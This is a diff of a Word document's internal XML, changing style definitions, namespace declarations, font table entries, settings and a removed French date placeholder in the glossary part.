+    <w:lsdException w:name="Subtle Reference" w:semiHidden="0" w:uiPriority="31" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Reference" w:semiHidden="0" w:uiPriority="32" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Book Title" w:semiHidden="0" w:uiPriority="33" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Bibliography" w:uiPriority="37"/>
+    <w:lsdException w:name="TOC Heading" w:uiPriority="39" w:qFormat="1"/>
   </w:latentStyles>
   <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
     <w:name w:val="Normal"/>
@@ -21075,7 +20405,7 @@
 </file>
 
 <file path=word/glossary/document.xml><?xml version="1.0" encoding="utf-8"?>
-<w:glossaryDocument xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid wp14">
+<w:glossaryDocument xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14">
   <w:docParts>
     <w:docPart>
       <w:docPartPr>
@@ -21199,42 +20529,12 @@
         </w:p>
       </w:docPartBody>
     </w:docPart>
-    <w:docPart>
-      <w:docPartPr>
-        <w:name w:val="5A5511C25BAE4A17AC4003190907EC5E"/>
-        <w:category>
-          <w:name w:val="Général"/>
-          <w:gallery w:val="placeholder"/>
-        </w:category>
-        <w:types>
-          <w:type w:val="bbPlcHdr"/>
-        </w:types>
-        <w:behaviors>
-          <w:behavior w:val="content"/>
-        </w:behaviors>
-        <w:guid w:val="{A19CC414-1D96-4C8D-96E3-941659AA1B47}"/>
-      </w:docPartPr>
-      <w:docPartBody>
-        <w:p>
-          <w:pPr>
-            <w:pStyle w:val="5A5511C25BAE4A17AC4003190907EC5E"/>
-          </w:pPr>
-          <w:r>
-            <w:rPr>
-              <w:b/>
-              <w:bCs/>
-            </w:rPr>
-            <w:t>[Choisir la date]</w:t>
-          </w:r>
-        </w:p>
-      </w:docPartBody>
-    </w:docPart>
   </w:docParts>
 </w:glossaryDocument>
 </file>
 
 <file path=word/glossary/fontTable.xml><?xml version="1.0" encoding="utf-8"?>
-<w:fonts xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid">
+<w:fonts xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" mc:Ignorable="w14">
   <w:font w:name="Times New Roman">
     <w:panose1 w:val="02020603050405020304"/>
     <w:charset w:val="00"/>
@@ -21275,7 +20575,7 @@
     <w:charset w:val="00"/>
     <w:family w:val="roman"/>
     <w:pitch w:val="variable"/>
-    <w:sig w:usb0="E00006FF" w:usb1="400004FF" w:usb2="00000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
+    <w:sig w:usb0="E00002FF" w:usb1="400004FF" w:usb2="00000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
   </w:font>
   <w:font w:name="Tahoma">
     <w:panose1 w:val="020B0604030504040204"/>
@@ -21285,24 +20585,18 @@
     <w:sig w:usb0="E1002EFF" w:usb1="C000605B" w:usb2="00000029" w:usb3="00000000" w:csb0="000101FF" w:csb1="00000000"/>
   </w:font>
   <w:font w:name="Helvetica">
-    <w:panose1 w:val="020B0604020202020204"/>
+    <w:panose1 w:val="020B0504020202020204"/>
     <w:charset w:val="00"/>
     <w:family w:val="swiss"/>
+    <w:notTrueType/>
     <w:pitch w:val="variable"/>
-    <w:sig w:usb0="E0002EFF" w:usb1="C0007843" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
-  </w:font>
-  <w:font w:name="Calibri Light">
-    <w:panose1 w:val="020F0302020204030204"/>
-    <w:charset w:val="00"/>
-    <w:family w:val="swiss"/>
-    <w:pitch w:val="variable"/>
-    <w:sig w:usb0="E0002AFF" w:usb1="C000247B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
+    <w:sig w:usb0="00000003" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00000001" w:csb1="00000000"/>
   </w:font>
 </w:fonts>
 </file>
 
 <file path=word/glossary/settings.xml><?xml version="1.0" encoding="utf-8"?>
-<w:settings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main" mc:Ignorable="w14 w15 w16se w16cid">
+<w:settings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main" mc:Ignorable="w14">
   <w:view w:val="normal"/>
   <w:defaultTabStop w:val="708"/>
   <w:hyphenationZone w:val="425"/>
@@ -21313,11 +20607,11 @@
     <w:compatSetting w:name="overrideTableStyleFontSizeAndJustification" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/>
     <w:compatSetting w:name="enableOpenTypeFeatures" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/>
     <w:compatSetting w:name="doNotFlipMirrorIndents" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/>
-    <w:compatSetting w:name="useWord2013TrackBottomHyphenation" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/>
   </w:compat>
   <w:rsids>
     <w:rsidRoot w:val="00FB4360"/>
     <w:rsid w:val="00A859A4"/>
+    <w:rsid w:val="00F90142"/>
     <w:rsid w:val="00FB4360"/>
   </w:rsids>
   <m:mathPr>
@@ -21341,7 +20635,7 @@
 </file>
 
 <file path=word/glossary/styles.xml><?xml version="1.0" encoding="utf-8"?>
-<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid">
+<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" mc:Ignorable="w14">
   <w:docDefaults>
     <w:rPrDefault>
       <w:rPr>
@@ -21357,382 +20651,358 @@
       </w:pPr>
     </w:pPrDefault>
   </w:docDefaults>
-  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="0" w:defUnhideWhenUsed="0" w:defQFormat="0" w:count="375">
-    <w:lsdException w:name="Normal" w:uiPriority="0" w:qFormat="1"/>
-    <w:lsdException w:name="heading 1" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 2" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 3" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 4" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 5" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 6" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 7" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 8" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 9" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="index 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 9" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 1" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 2" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 3" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 4" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 5" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 6" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 7" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 8" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 9" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Normal Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="footnote text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="annotation text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="header" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="footer" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="caption" w:semiHidden="1" w:uiPriority="35" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="table of figures" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="envelope address" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="envelope return" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="footnote reference" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="annotation reference" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="line number" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="page number" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="endnote reference" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="endnote text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="table of authorities" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="macro" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toa heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Bullet" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Number" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Bullet 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Bullet 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Bullet 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Bullet 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Number 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Number 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Number 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Number 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Title" w:uiPriority="10" w:qFormat="1"/>
-    <w:lsdException w:name="Closing" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Signature" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Default Paragraph Font" w:semiHidden="1" w:uiPriority="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Continue" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Continue 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Continue 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Continue 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Continue 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Message Header" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Subtitle" w:uiPriority="11" w:qFormat="1"/>
-    <w:lsdException w:name="Salutation" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Date" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text First Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text First Indent 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Note Heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text Indent 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text Indent 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Block Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Hyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="FollowedHyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Strong" w:uiPriority="22" w:qFormat="1"/>
-    <w:lsdException w:name="Emphasis" w:uiPriority="20" w:qFormat="1"/>
-    <w:lsdException w:name="Document Map" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Plain Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="E-mail Signature" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Top of Form" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Bottom of Form" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Normal (Web)" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Acronym" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Address" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Cite" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Code" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Definition" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Keyboard" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Preformatted" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Sample" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Typewriter" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Variable" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Normal Table" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="annotation subject" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="No List" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Outline List 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Outline List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Outline List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Simple 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Simple 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Simple 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Classic 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Classic 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Classic 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Classic 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Colorful 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Colorful 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Colorful 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Columns 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Columns 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Columns 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Columns 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Columns 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table 3D effects 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table 3D effects 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table 3D effects 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Contemporary" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Elegant" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Professional" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Subtle 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Subtle 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Web 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Web 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Web 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Balloon Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid" w:semiHidden="1" w:uiPriority="59" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Theme" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Placeholder Text" w:semiHidden="1"/>
-    <w:lsdException w:name="No Spacing" w:uiPriority="1" w:qFormat="1"/>
-    <w:lsdException w:name="Light Shading" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 1" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 1" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 1" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 1" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 1" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 1" w:uiPriority="65"/>
-    <w:lsdException w:name="Revision" w:semiHidden="1"/>
-    <w:lsdException w:name="List Paragraph" w:uiPriority="34" w:qFormat="1"/>
-    <w:lsdException w:name="Quote" w:uiPriority="29" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Quote" w:uiPriority="30" w:qFormat="1"/>
-    <w:lsdException w:name="Medium List 2 Accent 1" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 1" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 1" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 1" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 1" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 1" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 1" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 1" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 2" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 2" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 2" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 2" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 2" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 2" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2 Accent 2" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 2" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 2" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 2" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 2" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 2" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 2" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 2" w:uiPriority="73"/>
